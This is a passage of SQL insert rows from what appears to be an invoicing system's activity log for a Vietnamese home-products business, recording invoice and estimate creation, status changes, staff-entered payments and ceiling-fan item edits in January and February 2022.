(107, 'invoice', 19, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.940.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/14\" target=\"_blank\">#14</a>\";}', '3', 'Hieu Le', '2022-01-20 11:14:15'),
(108, 'invoice', 20, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 11:33:49'),
(109, 'invoice', 20, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 11:33:49'),
(110, 'invoice', 20, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 11:35:57'),
(111, 'invoice', 20, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/15\" target=\"_blank\">#15</a>\";}', '3', 'Hieu Le', '2022-01-20 11:35:57'),
(112, 'invoice', 21, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 11:51:19'),
(113, 'invoice', 21, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 11:52:23'),
(114, 'invoice', 21, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"9.300.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/16\" target=\"_blank\">#16</a>\";}', '3', 'Hieu Le', '2022-01-20 11:52:23'),
(115, 'invoice', 22, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 12:01:54'),
(116, 'invoice', 22, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 12:01:54'),
(117, 'invoice', 22, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 12:02:18'),
(118, 'invoice', 22, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/17\" target=\"_blank\">#17</a>\";}', '3', 'Hieu Le', '2022-01-20 12:02:18'),
(119, 'invoice', 23, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 13:36:41'),
(120, 'invoice', 23, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 13:36:41'),
(121, 'invoice', 23, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 13:36:57'),
(122, 'invoice', 23, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/18\" target=\"_blank\">#18</a>\";}', '3', 'Hieu Le', '2022-01-20 13:36:57'),
(123, 'invoice', 24, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-21 10:17:10'),
(124, 'invoice', 24, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-21 10:17:10'),
(125, 'invoice', 24, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-21 10:17:24'),
(126, 'invoice', 24, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"26.400.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/19\" target=\"_blank\">#19</a>\";}', '3', 'Hieu Le', '2022-01-21 10:17:24'),
(127, 'invoice', 25, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-21 11:39:30'),
(128, 'invoice', 25, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-21 11:39:30'),
(129, 'invoice', 25, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-21 11:39:49'),
(130, 'invoice', 25, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"21.571.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/20\" target=\"_blank\">#20</a>\";}', '3', 'Hieu Le', '2022-01-21 11:39:49'),
(131, 'invoice', 26, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-21 14:16:14'),
(132, 'invoice', 26, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-21 14:16:14'),
(133, 'invoice', 26, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-21 14:16:30'),
(134, 'invoice', 26, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.760.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/21\" target=\"_blank\">#21</a>\";}', '3', 'Hieu Le', '2022-01-21 14:16:30'),
(135, 'invoice', 27, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-21 14:22:48'),
(136, 'invoice', 27, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-21 14:23:16'),
(137, 'invoice', 27, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.120.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/22\" target=\"_blank\">#22</a>\";}', '3', 'Hieu Le', '2022-01-21 14:23:16'),
(138, 'invoice', 28, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-21 14:37:51'),
(139, 'invoice', 28, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-21 14:37:51'),
(140, 'invoice', 28, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-21 14:40:07'),
(141, 'invoice', 28, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.250.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/23\" target=\"_blank\">#23</a>\";}', '3', 'Hieu Le', '2022-01-21 14:40:07'),
(142, 'invoice', 29, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-22 15:40:30'),
(143, 'invoice', 29, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-22 15:40:30'),
(144, 'invoice', 29, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-22 15:40:47'),
(145, 'invoice', 29, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.200.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/24\" target=\"_blank\">#24</a>\";}', '3', 'Hieu Le', '2022-01-22 15:40:47'),
(146, 'estimate', 9, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-01-22 15:43:31'),
(147, 'invoice', 30, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-22 15:59:24'),
(148, 'invoice', 30, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-22 15:59:24'),
(149, 'invoice', 30, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:00:02'),
(150, 'invoice', 30, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/25\" target=\"_blank\">#25</a>\";}', '3', 'Hieu Le', '2022-01-22 16:00:02'),
(151, 'invoice', 31, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:17:26'),
(152, 'invoice', 31, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-22 16:17:26'),
(153, 'invoice', 31, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:18:22'),
(154, 'invoice', 31, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"58.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/26\" target=\"_blank\">#26</a>\";}', '3', 'Hieu Le', '2022-01-22 16:18:22'),
(155, 'invoice', 32, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:26:07'),
(156, 'invoice', 32, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-22 16:26:07'),
(157, 'invoice', 32, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:26:24'),
(158, 'invoice', 32, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.420.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/27\" target=\"_blank\">#27</a>\";}', '3', 'Hieu Le', '2022-01-22 16:26:24'),
(159, 'invoice', 33, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-22 16:37:05'),
(160, 'invoice', 33, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-22 16:37:05'),
(161, 'invoice', 13, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-22 22:43:50'),
(162, 'invoice', 13, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.843.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/28\" target=\"_blank\">#28</a>\";}', '1', 'Ho Gia Phat', '2022-01-22 22:43:50'),
(163, 'invoice', 34, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-24 10:29:36'),
(164, 'invoice', 34, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-24 10:29:36'),
(165, 'invoice', 34, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-24 10:29:52'),
(166, 'invoice', 34, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"31.130.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/29\" target=\"_blank\">#29</a>\";}', '3', 'Hieu Le', '2022-01-24 10:29:52'),
(167, 'invoice', 35, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-24 14:11:41'),
(168, 'invoice', 35, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-24 14:11:41'),
(169, 'invoice', 35, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-24 14:11:51'),
(170, 'invoice', 35, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.150.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/30\" target=\"_blank\">#30</a>\";}', '3', 'Hieu Le', '2022-01-24 14:11:51'),
(171, 'estimate', 6, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:41:\"Nhân công lắp đặt trần bê tông\";}', '6', 'Mỹ Anh ', '2022-01-25 10:03:14'),
(172, 'invoice', 36, 'invoice_activity_created', '', '6', 'Mỹ Anh ', '2022-01-25 10:04:00'),
(173, 'estimate', 6, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/36\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh ', '2022-01-25 10:04:00'),
(174, 'estimate', 10, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-02-08 15:13:48'),
(175, 'estimate', 10, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-02-08 15:14:35'),
(176, 'estimate', 10, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:50:\"Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood\";}', '1', 'Ho Gia Phat', '2022-02-08 15:15:39'),
(177, 'estimate', 10, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:50:\"Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood\";}', '1', 'Ho Gia Phat', '2022-02-08 15:15:39'),
(178, 'estimate', 10, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:50:\"Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood\";i:1;s:4:\"1.00\";i:2;s:1:\"4\";}', '1', 'Ho Gia Phat', '2022-02-08 15:15:47'),
(179, 'invoice', 37, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-02-08 15:17:33'),
(180, 'estimate', 10, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/37\">INV-34-22</a>\";}', '1', 'Ho Gia Phat', '2022-02-08 15:17:33'),
(181, 'invoice', 36, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh ', '2022-02-09 10:03:27'),
(182, 'invoice', 36, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/31\" target=\"_blank\">#31</a>\";}', '6', 'Mỹ Anh ', '2022-02-09 10:03:27'),
(183, 'invoice', 38, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-10 11:22:01'),
(184, 'invoice', 38, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:22:24'),
(185, 'invoice', 38, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:22:34'),
(186, 'invoice', 38, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.350.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/32\" target=\"_blank\">#32</a>\";}', '3', 'Hieu Le', '2022-02-10 11:22:34'),
(187, 'invoice', 39, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:26:00'),
(188, 'invoice', 39, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-10 11:26:00'),
(189, 'invoice', 39, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:26:15'),
(190, 'invoice', 39, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.700.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/33\" target=\"_blank\">#33</a>\";}', '3', 'Hieu Le', '2022-02-10 11:26:15'),
(191, 'invoice', 40, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:34:09'),
(192, 'invoice', 40, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-10 11:34:09'),
(193, 'invoice', 41, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:55:41'),
(194, 'invoice', 41, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-10 11:55:41'),
(195, 'invoice', 41, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-10 11:56:02'),
(196, 'invoice', 41, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/34\" target=\"_blank\">#34</a>\";}', '3', 'Hieu Le', '2022-02-10 11:56:02'),
(197, 'invoice', 42, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-10 12:02:13'),
(198, 'invoice', 42, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-10 12:02:13'),
(199, 'invoice', 42, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-10 12:02:33'),
(200, 'invoice', 42, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.400.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/35\" target=\"_blank\">#35</a>\";}', '3', 'Hieu Le', '2022-02-10 12:02:33'),
(201, 'invoice', 43, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-12 11:35:02'),
(202, 'invoice', 43, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-12 11:35:02'),
(203, 'invoice', 43, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-12 11:35:14'),
(204, 'invoice', 43, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.625.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/36\" target=\"_blank\">#36</a>\";}', '3', 'Hieu Le', '2022-02-12 11:35:14'),
(205, 'invoice', 40, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-12 11:36:06'),
(206, 'invoice', 40, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.350.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/37\" target=\"_blank\">#37</a>\";}', '3', 'Hieu Le', '2022-02-12 11:36:06'),
(207, 'invoice', 37, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-12 11:38:15'),
(208, 'invoice', 37, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"20.400.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/38\" target=\"_blank\">#38</a>\";}', '3', 'Hieu Le', '2022-02-12 11:38:15'),
(209, 'estimate', 11, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-14 09:43:42'),
(210, 'estimate', 11, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5040000.00\";i:1;s:7:\"4725000\";}', '3', 'Hieu Le', '2022-02-14 09:59:52'),
(211, 'estimate', 11, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:24:\"Chi phí vận chuyển \";i:1;s:23:\"Chi phí vận chuyển\";}', '3', 'Hieu Le', '2022-02-14 09:59:52'),
(212, 'estimate', 12, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-14 10:44:51'),
(213, 'estimate', 13, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-14 10:49:07'),
(214, 'estimate', 12, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:7:\"4875000\";}', '3', 'Hieu Le', '2022-02-14 10:51:27'),
(215, 'estimate', 12, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:566:\"Model: DCF-SW60605<br />\r\nSố Cánh Quạt: 3 cánh<br />\r\nNguồn Điện: 220V/50-60Hz<br />\r\nĐiều Khiển:  DC 5 cấp độ kèm theo<br />\r\nCông Suất Động Cơ: 35W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).<br />\r\nHiệu suất gió mát và êm Cấp Độ Gió 5 cấp độ gió.<br />\r\nĐiều khiển DC sử dụng quay đổi chiều trực tiếp trên điều khiển<br />\r\nĐộng Cơ: motor DC (Brushless DC™)<br />\r\nSải Cánh (Đường Kính) 142cm/56inch<br />\r\nThương Hiệu: Tổ chức đào tạo WIT™<br />\r\n\";i:1;s:504:\"Model: DCF-SW60605\r\nSố Cánh Quạt: 3 cánh\r\nNguồn Điện: 220V/50-60Hz\r\nĐiều Khiển:  DC 5 cấp độ kèm theo\r\nCông Suất Động Cơ: 35W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).\r\nHiệu suất gió mát và êm Cấp Độ Gió 5 cấp độ gió.\r\nĐiều khiển DC sử dụng quay đổi chiều trực tiếp trên điều khiển\r\nĐộng Cơ: motor DC (Brushless DC™)\r\nSải Cánh (Đường Kính) 142cm/56inch\r\nThương Hiệu: Tổ chức đào tạo WIT™\";}', '3', 'Hieu Le', '2022-02-14 10:51:27'),
(216, 'estimate', 12, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '3', 'Hieu Le', '2022-02-14 10:51:27'),
(217, 'estimate', 13, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8800000.00\";i:1;s:7:\"6600000\";}', '3', 'Hieu Le', '2022-02-14 10:52:25'),
(218, 'estimate', 13, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:411:\"MODEL NO.: DCF-FS52930<br />\r\n- Fan size: 60inch ~ 1520mm, 3 blades solid Wood<br />\r\n- DC motor spec: DC Motor with BLDC, 38W<br />\r\n- Speed: 230 RPM<br />\r\n- Material blades: Wood, 3 blades<br />\r\n- Control: Remote control DC 5 speed included<br />\r\n- Power Input: 220V-240V/50Hz<br />\r\n- Finished Color: Matte Black<br />\r\n- Color: Dark Walnut<br />\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China<br />\r\n\";i:1;s:349:\"MODEL NO.: DCF-FS52930\r\n- Fan size: 60inch ~ 1520mm, 3 blades solid Wood\r\n- DC motor spec: DC Motor with BLDC, 38W\r\n- Speed: 230 RPM\r\n- Material blades: Wood, 3 blades\r\n- Control: Remote control DC 5 speed included\r\n- Power Input: 220V-240V/50Hz\r\n- Finished Color: Matte Black\r\n- Color: Dark Walnut\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China\";}', '3', 'Hieu Le', '2022-02-14 10:52:25'),
(219, 'estimate', 13, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '3', 'Hieu Le', '2022-02-14 10:52:25'),
(220, 'estimate', 14, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-14 11:16:57'),
(221, 'estimate', 14, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"5100000.00\";i:1;s:10:\"5440000.00\";}', '3', 'Hieu Le', '2022-02-14 11:25:07'),
(222, 'estimate', 14, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:347:\"MODEL NO.: 60YFT-808\r\n- Fan size: 60inch ~ 1520mm, 5 blades solid Wood\r\n- DC motor spec: DC Motor with BLDC, 38W\r\n- Speed: 390 RPM\r\n- Material blades: Wood, 5 blades\r\n- Control: Remote control DC 6 speed included\r\n- Power Input: 220V-240V/50Hz\r\n- Motor Color: Nicken\r\n- Blades Color: Light Wood\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China\r\n\";}', '3', 'Hieu Le', '2022-02-14 11:25:07'),
(223, 'estimate', 15, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-14 14:14:53'),
(224, 'estimate', 16, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-02-18 11:21:08'),
(225, 'invoice', 5, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '1', 'Ho Gia Phat', '2022-02-19 12:24:32'),
(226, 'invoice', 44, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:06:01'),
(227, 'invoice', 44, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-22 17:06:01'),
(228, 'invoice', 44, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:06:16'),
(229, 'invoice', 44, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.550.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/39\" target=\"_blank\">#39</a>\";}', '3', 'Hieu Le', '2022-02-22 17:06:16'),
(230, 'invoice', 45, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-22 17:13:20'),
(231, 'invoice', 45, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:13:39'),
(232, 'invoice', 45, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.350.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/40\" target=\"_blank\">#40</a>\";}', '3', 'Hieu Le', '2022-02-22 17:13:39'),
(233, 'invoice', 46, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:18:19'),
(234, 'invoice', 46, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-22 17:18:19'),
(235, 'invoice', 46, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:18:59'),
(236, 'invoice', 46, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/41\" target=\"_blank\">#41</a>\";}', '3', 'Hieu Le', '2022-02-22 17:18:59'),
(237, 'invoice', 47, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:22:28'),
(238, 'invoice', 47, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-02-22 17:22:28'),
(239, 'invoice', 47, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:22:48'),
(240, 'invoice', 47, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.197.500 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/42\" target=\"_blank\">#42</a>\";}', '3', 'Hieu Le', '2022-02-22 17:22:48'),
(241, 'invoice', 48, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-02-22 17:30:06'),
